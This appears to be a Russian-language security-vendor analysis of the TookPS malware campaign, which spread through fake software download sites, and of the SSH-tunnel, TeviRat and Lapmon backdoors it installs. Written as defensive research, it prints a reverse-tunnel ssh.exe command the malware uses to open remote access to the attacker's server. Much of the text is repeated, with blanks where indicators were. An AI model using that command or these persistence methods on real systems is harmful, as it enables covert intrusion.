В начале марта мы опубликовали исследование, посвященное нескольким вредоносным кампаниям, в которых в качестве приманки используется популярная нейросеть DeepSeek.
Позже, изучая телеметрию, мы увидели, что один из описанных в статье зловредов, а именно — , мимикрирует не только под нейросети. В частности, мы обнаружили поддельные сайты, которые имитируют официальные ресурсы различного ПО для удаленного доступа к компьютеру и 3D-моделирования, а также страницы, предлагающие бесплатно скачать это ПО.
Вредоносные сайты
Стоит отметить, что UltraViewer, AutoCAD и SketchUp часто используются в бизнесе. Таким образом, потенциальными жертвами этой кампании могут быть как частные пользователи, так и организации.
Помимо вредоносных сайтов мы обнаружили в телеметрии имена детектируемых файлов, такие как Ableton.exe и QuickenApp.exe. Ableton — это программное обеспечение для написания музыки, записи, микширования и сведения треков и т. д. Quicken — это приложение для управления личными финансами, позволяющее централизованно отслеживать расходы и доходы на разных счетах, задолженности, инвестиции и т. д.
Например, файл с MD5-хэшем связывается с (на момент исследования домен не работал), с которого получает вот такую команду, закодированную в base64:
Изначальная команда
После декодирования можно увидеть, что именно запускается в PowerShell:
В переменной $TookEnc находится еще один блок данных, закодированных в base64, который также исполняется в PowerShell. После расшифровки мы увидим следующую команду:
Декодированная команда из переменной $TookEnc скрипта, приведенного на скриншоте выше
Пример расшифровки еще одной команды из переменной $TookEnc
Разные образцы команды содержат разные URL-адреса, однако в остальном они идентичны. Они последовательно скачивают с указанного URL три PowerShell-скрипта и запускают их. Первый из обнаруженных скриптов выкачивает с С2 файл sshd.exe, конфигурацию для него (файл config) и файл с ключом RSA. Второй получает параметры командной строки для запуска sshd: адрес удаленного сервера, порт и имя пользователя — после чего запускает sshd.
Пример строки запуска, сформированной вредоносным PowerShell-скриптом:
Эта команда запускает сервер SSH, который устанавливает туннель между зараженным устройством и удаленным сервером. Для аутентификации используется скачанный ранее ключ RSA, а конфигурация сервера берется из файла config. Туннель позволяет злоумышленнику получать доступ к системе и выполнять произвольные команды в ней.
Третий скрипт, в свою очередь, пытается скачать на компьютер жертвы модификацию зловреда Backdoor.Win32.TeviRat. Это известный бэкдор. Попавшая к нам модификация устанавливает на зараженное устройство ПО для удаленного доступа TeamViewer, .
Простыми словами, злоумышленники помещают в одну папку с TeamViewer вредоносную библиотеку, которая изменяет стандартное поведение и настройки этого ПО: прячет его от пользователя и предоставляет атакующим скрытый удаленный доступ. В исследуемой кампании в качестве C2 использовался домен .
Часть скрипта, который загружает Backdoor.Win32.TeviRat
Помимо этого, на зараженное устройство загружается бэкдор Backdoor.Win32.Lapmon.*. К сожалению, нам не удалось установить, что именно его доставляет. Этот бэкдор использует домен в качестве C2.
Таким образом, злоумышленники получают полный доступ к компьютеру жертвы несколькими разными способами.
Домены C2 и соответствующие им IP-адреса
Полезных для пользователя ресурсов на этих IP-адресах нам обнаружить не удалось. Зато, помимо доменов, связанных с текущей кампанией, мы обнаружили на них другие, которые уже давно блокируются нашими решениями. Это с высокой вероятностью значит, что TookPS, Lapmon и TeviRat — не первые в арсенале этих злоумышленников.
Чтобы не пострадать от подобных атак, мы советуем пользователям всегда быть внимательными и не скачивать пиратские программы, ведь они могут нести в себе большую угрозу.
Компаниям мы рекомендуем выработать грамотную политику безопасности, предусматривающую запрет на скачивание программ из сомнительных источников, в том числе с пиратских сайтов и торрентов. Также следует регулярно проводить тренинги по безопасности среди персонала, чтобы поддерживать осведомленность сотрудников на должном уровне.
Позже, изучая телеметрию, мы увидели, что один из описанных в статье зловредов, а именно — , мимикрирует не только под нейросети. В частности, мы обнаружили поддельные сайты, которые имитируют официальные ресурсы различного ПО для удаленного доступа к компьютеру и 3D-моделирования, а также страницы, предлагающие бесплатно скачать это ПО.
Вредоносные сайты
Стоит отметить, что UltraViewer, AutoCAD и SketchUp часто используются в бизнесе. Таким образом, потенциальными жертвами этой кампании могут быть как частные пользователи, так и организации.
Помимо вредоносных сайтов мы обнаружили в телеметрии имена детектируемых файлов, такие как Ableton.exe и QuickenApp.exe. Ableton — это программное обеспечение для написания музыки, записи, микширования и сведения треков и т. д. Quicken — это приложение для управления личными финансами, позволяющее централизованно отслеживать расходы и доходы на разных счетах, задолженности, инвестиции и т. д.
TookPS
В про атаки, использующие DeepSeek в качестве приманки, мы вкратце описывали цепочку заражения, которую запускает Trojan-Downloader.Win32.TookPS. Рассмотрим ее подробнее. Попав на устройство жертвы, загрузчик связывается с C2, домен которого содержится в его коде, чтобы получить PowerShell-скрипт. Разные образцы зловреда обращаются к разным доменам.Например, файл с MD5-хэшем связывается с (на момент исследования домен не работал), с которого получает вот такую команду, закодированную в base64:
Изначальная команда
После декодирования можно увидеть, что именно запускается в PowerShell:
В переменной $TookEnc находится еще один блок данных, закодированных в base64, который также исполняется в PowerShell. После расшифровки мы увидим следующую команду:
Декодированная команда из переменной $TookEnc скрипта, приведенного на скриншоте выше
Пример расшифровки еще одной команды из переменной $TookEnc
Разные образцы команды содержат разные URL-адреса, однако в остальном они идентичны. Они последовательно скачивают с указанного URL три PowerShell-скрипта и запускают их. Первый из обнаруженных скриптов выкачивает с С2 файл sshd.exe, конфигурацию для него (файл config) и файл с ключом RSA. Второй получает параметры командной строки для запуска sshd: адрес удаленного сервера, порт и имя пользователя — после чего запускает sshd.
Пример строки запуска, сформированной вредоносным PowerShell-скриптом:
| 1 | ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config" |
Эта команда запускает сервер SSH, который устанавливает туннель между зараженным устройством и удаленным сервером. Для аутентификации используется скачанный ранее ключ RSA, а конфигурация сервера берется из файла config. Туннель позволяет злоумышленнику получать доступ к системе и выполнять произвольные команды в ней.
Третий скрипт, в свою очередь, пытается скачать на компьютер жертвы модификацию зловреда Backdoor.Win32.TeviRat. Это известный бэкдор. Попавшая к нам модификация устанавливает на зараженное устройство ПО для удаленного доступа TeamViewer, .
Простыми словами, злоумышленники помещают в одну папку с TeamViewer вредоносную библиотеку, которая изменяет стандартное поведение и настройки этого ПО: прячет его от пользователя и предоставляет атакующим скрытый удаленный доступ. В исследуемой кампании в качестве C2 использовался домен .
Часть скрипта, который загружает Backdoor.Win32.TeviRat
Помимо этого, на зараженное устройство загружается бэкдор Backdoor.Win32.Lapmon.*. К сожалению, нам не удалось установить, что именно его доставляет. Этот бэкдор использует домен в качестве C2.
Таким образом, злоумышленники получают полный доступ к компьютеру жертвы несколькими разными способами.
Инфраструктура
Большинство доменов, к которым обращаются вредоносные скрипты и программы в этой атаке, зарегистрированы в первой половине 2024 года и располагаются на одном из двух IP-адресов:Домены C2 и соответствующие им IP-адреса
Полезных для пользователя ресурсов на этих IP-адресах нам обнаружить не удалось. Зато, помимо доменов, связанных с текущей кампанией, мы обнаружили на них другие, которые уже давно блокируются нашими решениями. Это с высокой вероятностью значит, что TookPS, Lapmon и TeviRat — не первые в арсенале этих злоумышленников.
Заключение
Атаки с использованием DeepSeek в качестве приманки в случае TookPS оказались лишь вершиной айсберга — масштабной кампании, нацеленной как на домашних пользователей, так и на организации. Злоумышленники распространяли вредоносное ПО под видом различных популярных программ, в том числе востребованных в бизнесе. После первичного заражения они пытались разными способами установить скрытый доступ к устройству жертвы.Чтобы не пострадать от подобных атак, мы советуем пользователям всегда быть внимательными и не скачивать пиратские программы, ведь они могут нести в себе большую угрозу.
Компаниям мы рекомендуем выработать грамотную политику безопасности, предусматривающую запрет на скачивание программ из сомнительных источников, в том числе с пиратских сайтов и торрентов. Также следует регулярно проводить тренинги по безопасности среди персонала, чтобы поддерживать осведомленность сотрудников на должном уровне.
